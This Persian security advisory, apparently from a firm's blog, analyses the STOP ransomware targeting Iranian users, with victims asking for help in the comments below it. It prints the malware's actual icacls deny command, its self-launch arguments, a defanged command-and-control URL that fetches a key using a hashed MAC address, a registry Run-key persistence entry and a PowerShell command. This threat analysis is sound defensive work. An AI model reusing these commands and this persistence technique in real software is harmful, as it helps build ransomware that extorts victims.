کاربران ایرانی، هدف گسترده باج‌افزار STOP

در روزهای اخیر گزارش‌های متعددی در خصوص مشاهده آلودگی بر روی سیستم برخی کاربران ایرانی به نسخه‌های جدید باج‌افزار STOP به شرکت مهندسی شبکه گستر واصل شده است.

باج‌افزار STOP که نخستین نسخه آن در آذر 1397 شناسایی شد از روش‌های مختلفی برای آلوده کردن سیستم‌ها بهره می‌گیرد. در یکی از این روش‌ها، گردانندگان STOP با تزریق کد مخرب به برخی برنامه‌های موسوم به Crack،وKey Generator و Activator و به‌اشتراک‌گذاری آنها در سطح اینترنت دستگاه کاربرانی را که اقدام به دریافت و اجرای این برنامه‌ها می‌کنند به باج‌افزار آلوده می‌سازند. متأسفانه این شیوه، اصلی‌ترین دلیل انتشار موفق STOP در سطح کشور است. به‌خصوص آنکه در زمان اجرای چنین برنامه‌هایی بسیاری از کاربران اقدام به غیرفعال کردن موقت ضدویروس خود کرده و همین مدت کم، برای اجرا شدن باج‌افزار و شروع فرایند رمزگذاری کافی خواهد بود.

به گزارش شرکت مهندسی شبکه گستر، STOP از جمله باج‌افزارهایی است که در هر یک از نسخه‌های خود، پسوندی متفاوت از نسخه قبلی به فایل‌های رمزگذاری شده الصاق می‌کند. فهرست پسوندهای بکار گرفته شده توسط این باج‌افزار به شرح زیر است:

.STOP, .SUSPENDED, .WAITING, .PAUSA, .CONTACTUS, .DATASTOP, .STOPDATA, .KEYPASS, .WHY, .SAVEfiles, .DATAWAIT, .INFOWAIT, .puma, .pumax, .pumas, .shadow, .djvu, .djvuu, .udjvu, .djvuq, .uudjvu, .djvus, .djvur, .djvut .pdff, .tro, .tfude, .tfudeq, .tfudet, .rumba, .adobe, .adobee, .blower, .promos, .promoz, .promock, .promoks, .promorad,, promorad2, .kroput, .kroput1, .charck, .pulsar1, .klope, .kropun, .charcl, .doples, .luces, .luceq, .chech, .proden, .drume, .tronas, .trosak, .grovas, .grovat, .roland, .refols, .raldug, .etols, .guvara, .browec, .norvas, .moresa, .verasto, .hrosas, .kiratos, .todarius, .hofos, .roldat, .dutan, .sarut, .fedasot, .forasom, .berost, .fordan, .codnat, .codnat1, .bufas, .dotmap, .radman, .ferosas, .rectot, .skymap, .mogera, .rezuc, .stone, .redmat, .lanset, .davda, .poret, .pidon, .heroset, .myskle, .boston, .muslat, .gerosan, .vesad, .horon, .neras, .truke, .dalle, .lotep, .nusar, .litar, .besub, .cezor, .lokas, .godes, .budak, .vusad, .herad, .berosuce, .gehad, .gusau, .madek, .tocue, .darus, .lapoi, .todar, .dodoc, .bopador, .novasof, .ntuseg, .ndarod, .access, .format, .nelasod, .mogranos, .cosakos, .nvetud, .lotej, .kovasoh, .prandel, .zatrov, .masok, .brusaf, .londec, .krusop, .mtogas, .nasoh, .nacro, .pedro, .nuksus, .vesrato. .masodas, .stare, .cetori, .carote, .coharos, .shariz, .gero, .hese, .xoza, .seto, .peta, .moka, .meds, .kvag, .domn, .karl, .nesa, .boot, .noos, .kuub, .reco, .bora, .leto, .nols, .werd, .coot, .derp, .nakw, .meka, .toec, .mosk, .lokf, .peet, .grod, .mbed, .kodg, .zobm, .rote, .msop, .hets, .righ, .gesd, .merl, .mkos, .nbes, .piny, .redl, .nosu, .kodc, .reha, .topi

در نسخه‌های نخست این باج‌افزار در صورت عدم اتصال دستگاه آلوده شده به اینترنت، باج افزار با مکانیزمی اقدام به رمزگذاری فایل‌ها می‌کرد که در برخی موارد امکان بازگردانی آنها بدون نیاز به پرداخت باج امکان پذیر می بود. در مهر ماه 1398 نیز شرکت ام‌سی‌سافت با مشارکت یک محقق امنیتی موفق به ساخت ابزاری شد که امکان رمزگشایی 148 گونه از باج‌افزار مخرب STOP را فراهم می‌کند. اما در نسخه های اخیر این باج‌افزار باگ‌ها و اشکالات مذکور برطرف شده است. گر چه امتحان کردن ابزار ام‌سی‌سافت به تمامی قربانیان STOP توصیه می‌شود.

STOP کشوری که دستگاه در آن قرار دارد را شناسایی و در صورت تطابق آن با هر یک از کشورهای نمایش داده شده در تصویر زیر اجرای خود را متوقف می‌کند.

بر خلاف روال معمول باج‌افزارهای هم‌قطار شناسایی کشور نه از طریق بررسی پوسته صفحه‌کلید (Keyboard Layout) که با مراجعه به نشانی https[:]//api.2ip.ua/geo.json صورت می‌پذیرد. در تصویر زیر نمونه‌ای از پاسخ ارسالی از سوی نشانی مذکور نمایش داده شده است.

در صورتی که کشور شناسایی شده در فهرست درج شده در کد STOP نباشد پوشه‌ای که نام آن برگرفته شده از شناسه UUID یا GUID است در مسیر زیر ایجاد شده و در ادامه فایل مخرب در آن کپی می‌شود.

%AppData%\Local\

در ادامه با استفاده از فرمان icacls فهرست کنترل دسترسی آن تغییر داده می‌شود:

“icacls \”%AppData%\\Local\\{UuId}\” /deny *S-1-1-0:(OI)(CI)(DE,DC)”

سپس از طریق فرمان زیر خود را اجرا می‌کند:

<Directory Path>\ewrewexcf.exe –Admin IsNotAutoStart IsNotTask

پارامترهای مذکور تعیین می‌کنند که پروسه از طریق برنامه‌های موسوم به Autostart یا فرامین زمانبندی‌شده (Scheduled Task) فراخوانی نشده و اجرای آن با سطح دسترسی اعلا صورت صورت گرفته است.

با اجرای این پروسه با استفاده از TaskSchedulerCOM فرمان‌زمانبندی شده‌ای در مسیر زیر ایجاد می‌شود.

C:\Windows\System32\Tasks\Time Trigger Task

نشانی MAC سیستم نیز با استفاده از فرمان ()GetAdaptersInfo استخراج می‌شود. درهم‌ساز MD5 این نشانی MAC با استفاده از توابع Windows Crypto API محاسبه شده و به‌عنوان شناسه انحصاری دستگاه در نظر گرفته می‌شود. در ادامه یک درخواست در قالب زیر به سرور فرماندهی (Command and Control) ارسال شده و در پاسخ یک کلید رمزگذاری عمومی مبتنی بر RSA-2048 دریافت می‌شود.

http://ring2[.]ug/As73yhsyU34578hxxx/SDf565g/get.php?pid={Mac Address_MD5}&first=true

پاسخ دریافت شده در فایل bowsakkdestx.txt در مسیر زیر ذخیره می‌شود:

%AppData%\Local

 از کلید مذکور در ادامه برای رمزگذاری استفاده می‌شود. در جریان این ارتباط شناسه دریافت شده به همراه کلید عمومی در فایل PersonalID.txt در مسیر C:\SystemID برای استفاده‌های آتی ذخیره می‌شود.

در صورتی که باج افزار قادر به برقراری ارتباط با سرور فرماندهی خود نباشد وجود فایل bowsakkdestx.txt در مسیر AppData%/Local% را مورد بررسی قرار داده و کلید واژه Public Key را در آن جستجو می‌کند. چنانچه فایل فاقد کلید عمومی باشد STOP فایل را حذف کرده و مجدد برای دریافت پاسخ از سمت سرور فرماندهی اقدام می‌کند. اما اگر فایل وجود نداشت از کلید عمومی و شناسه‌ایی که در کد باج‌افزار درج شده استفاده می‌کند. اکثر رشته‌های درج شده در کد با استفاده از روش‌های XOR و با کلیدهایی نظیر 0x80 رمزگذاری شده‌اند.

STOP برای ماندگار کردن خود بر روی دستگاه قربانی اقدام به ایجاد کلید زیر در محضرخانه (Registry) سیستم عامل می‌کند:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “SysHelper” = “%AppData%\Local\{UuId}\34efcdsax.exe” –AutoStart

باج‌افزار فایل موسوم به اطلاعیه باج‌گیری (Ransom Note) را در هر پوشه‌ای که حداقل یکی از فایل های آن رمزگذاری شده کپی می‌کند. نمونه‌ای از این اطلاعیه در تصویر زیر قابل مشاهده است.

STOP از رمزگذاری فایل های با هر یک از پسوندهای زیر خودداری می‌کند:

  • .sys
  • .ini
  • .dll
  • .blf
  • .bat
  • .lnk
  • .regtrans-ms

همچنین از رمزگذاری فایل‌های زیر صرف‌نظر می‌شود:

  • ntuser.dat
  • ntuser.dat.LOG1
  • ntuser.dat.LOG2
  • ntuser.pol 
  • _readme.txt

زیرپوشه‌های درون پوشه‌های Windows و Program Files نیز از رمزگذاری شدن مستثنی شده‌اند.

STOP،و5 بایت ابتدایی فایل را دست‌نخورده رها کرده و باقی آن را با الگوریتم Salsa20 و کلید عمومی مبتنی بر RSA-2048 رمزگذاری می‌کند.

در نمونه‌های اخیر، STOP اقدام به دریافت بدافزارهایی دیگر از سرور فرماندهی خود می‌کند. از جمله این بدافزارها، Vidar است که اطلاعات زیر را از روی سیستم قربانی جمع آوری و آنها را به سرور فرماندهی ارسال می‌کند:

  • داده‌های اصالت‌سنجی مرورگر، سوابق و کوکی‌ها
  • کاشه مرورگر
  • اطلاعات سیستم
  • داده‌های نرم‌افزارهای پیام‌رسان و مدیریت‌کننده ایمیل
  • داده‌های نرم‌افزارهای اصالت‌سنجی دو عاملی

یا می‌توان به بدافزاری مشابه با Vilsel اشاره کرد که STOP آن را با استفاده از پروسه معتبر PowerShell و در قالب زیر اجرا می‌کند:

powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

برای مثال در تصویر زیر m5.exeیکی از فایل‌های Vidar و updatewin1.exe از فایل‌های Vilsel است.

همچون همیشه بکارگیری روش‌های پیشگیرانه در مقابله با باج‌افزارها و مقاوم سازی پودمان RDP برای ایمن ماندن از گزند باج‌افزارها توصیه می‌شود.

همچنین نمونه‌های اخیر STOP با نام‌های زیر قابل شناسایی است:

Bitdefender

  • Trojan.GenericKD.42095141
  • Trojan.GenericKD.41974832
  • Trojan.GenericKD.31534187
  • Trojan.GenericKD.32681723
    Trojan.GenericKD.42311675
    Trojan.GenericKD.41329669
    Trojan.GenericKDZ.62418
  • Trojan.AgentWDCR.SUF
  • Gen:Variant.Trojan.Crypt.63
  • Gen:Variant.Midie.68497

McAfee

  • GenericRXJH-CM!74A9A6443076
  • GenericRXJA-ZM!B0A89E143BAB
    GenericRXJO-OE!44E10B64BE30
    Trojan-FRQV!290E97907E5B
    Sodinokibi!4E8F1415DD33
    RDN/Generic PWS.y
  • RDN/Generic PUP.z
    RDN/Generic.hra
  • Generic.bto

Sophos

  • Mal/Generic-S
  • Mal/GandCrab-G

 

اشتراک گذاری

Facebook
Twitter
WhatsApp
Telegram

نظرات

13 پاسخ

  1. با سلام سیستم من الوده به این باج افزار شده که با .topi تغییر پسوند و رمز نگاری شده اند . ایا راحی هست برای شکستن رمز و باز گردانی فایل ها ؟

    1. سلام متاسفانه تمامی فایلها و عکس های من هم پسوندtopiگرفتن چکارکنم؟

  2. با سلام
    متاسفانه سیستم من به باج افزار karl مبتلا شده و همه فایلها به این پسوند تعییر پیدا کردن راه حلش چیست؟

  3. سلام یکسال پیش سیتم بنده گریبانگیر ویروس باجگیر با پسوند derp شد چه جوری میتونم قفل گشایی کنم با تشکر

  4. سلام خسته نباشید لب تاب بنده 4 ماه هست که گرفتار بد افزار .mljx شده من با هر روشی که ممکن بود رفتم نتونستم کاری بکنم همچنین این بد افزار من انلاین هم هست و من تونستم با کمک بعضی از سایت ها دست انها رو از اطلاعات خودم کوتاه کنم ولی تمام راه های اینترنتی من رو کنترل میکنه و به اجبار میخواهد وارد جیمیل هایم بشه من هر دفعه رمزش رو سنگین تر از قبل میزارم میخواستم ببینم شما روشی دارین که من بتونم برگردونم؟؟؟؟؟؟

    1. سلام. اگر احتمال آلودگی سیستم و فعال بودن بدافزار روی دستگاه خود را می دهید، ابتدا با استفاده از یک نرم افزار ضدویروس به روز اقدام به پاکسازی کنید. برای اطمینان از اینکه در هنگام اجرای ضدویروس، بدافزار فعال و مخفی نیست، از دیسکهای راه انداز (Bootable Disk) برای راه اندازی دستگاه خود استفاده کرده و سپس اقدام به اسکن کامل با ضدویروس نمایید. موفق باشید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *